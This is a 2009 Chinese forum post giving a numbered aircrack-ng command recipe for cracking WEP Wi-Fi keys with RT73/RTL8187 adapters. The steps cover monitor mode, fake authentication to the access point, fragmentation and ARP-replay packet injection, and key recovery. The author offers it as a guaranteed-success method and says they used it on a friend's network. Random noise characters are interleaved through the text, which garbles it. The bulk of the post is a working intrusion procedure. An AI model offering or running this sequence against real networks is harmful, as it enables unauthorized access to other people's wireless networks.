上等兵
- 注册时间
- 2009-4-5
- 金币
- 78 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
今天帮朋友破解WEP加密,发现前几天回贴中第4条命令用错了,原贴是aireplay,正确的是airodump,现纠正过来:' L! i& ^5 H/ k7 `4 y4 A
我用RTL8187成功破解几个无线信号后的总结,按此进行包你成功! O p& @. ^% b& a2 w! o, R
RT73无线网卡命令" G) I- x- Y* ]4 b
Shell1: ^2 }9 s* n: Q; S' j, X0 @7 m5 k7 \, H
1. ifconfig –a (查看PC的网卡)
6 ]6 l* t/ f9 }5 F% q2. ifconfig –a rausb0 up (加载网卡驱动)
% `- `' B' z% S/ N e& s5 g3. airmon-ng start rausb0 6 (激活网卡的monitor模式,6根据情况变化): }% g j+ q R
4. airodump-ng --ivs –w name –c 6 rausb0 % y1 ?" L# N2 L$ T- W# x5 o
(列出该频道的所有AP)
- x" e0 A2 g/ B* ]Shell2:; K2 n) e( y K5 Y7 m& ?
5. iwconfig rausb0 rate 2M (降低网卡的速率)
+ j+ I6 m+ l; l# P: j6. aireplay-ng -1 0 –e ap_essid –a ap_mac –h pc_mac rausb0
" s% E3 k% ?, V6 h, b5 B6 x: B9 E(用欺骗方式连上AP,ap_essid注意大小写)
+ ~- d3 Z4 ~! W. {7. aireplay-ng -5 –b ap_mac -h pc_mac rausb0 (抓获数据包后提示是否用该包模拟攻击,输入Y攻击,成功后显示fragment-****.xor文件)
/ i4 w- P5 o# ~" {) s, e% h) `8. packetforge-ng -0 –a ap_mac –h pc_mac –k 255.255.255.255 –l 255.255.255.255 –y fragment-****.xor –w mrarp (-l为-L,别错了)
1 o" G3 L8 L% r$ a Q9. aireplay-ng -2 –r mrarp –x 256 rausb0 (发攻击包,一般#DAATE达到3万以后进行下一步,256可以更改为128、512、1024)+ @; [6 z- I& c0 @& r0 r2 X: b
Shell3:8 w/ H4 y9 H) E" Y$ D- e( G9 _
10. aircrack-ng –n 64 –b ap_mac name-01.ivs (成功后显示密码的ASCII码)本文地址:http://forum.anywlan.com/thread-26169-1-1.html |
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2009-5-11 22:27
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2009-5-11 23:13
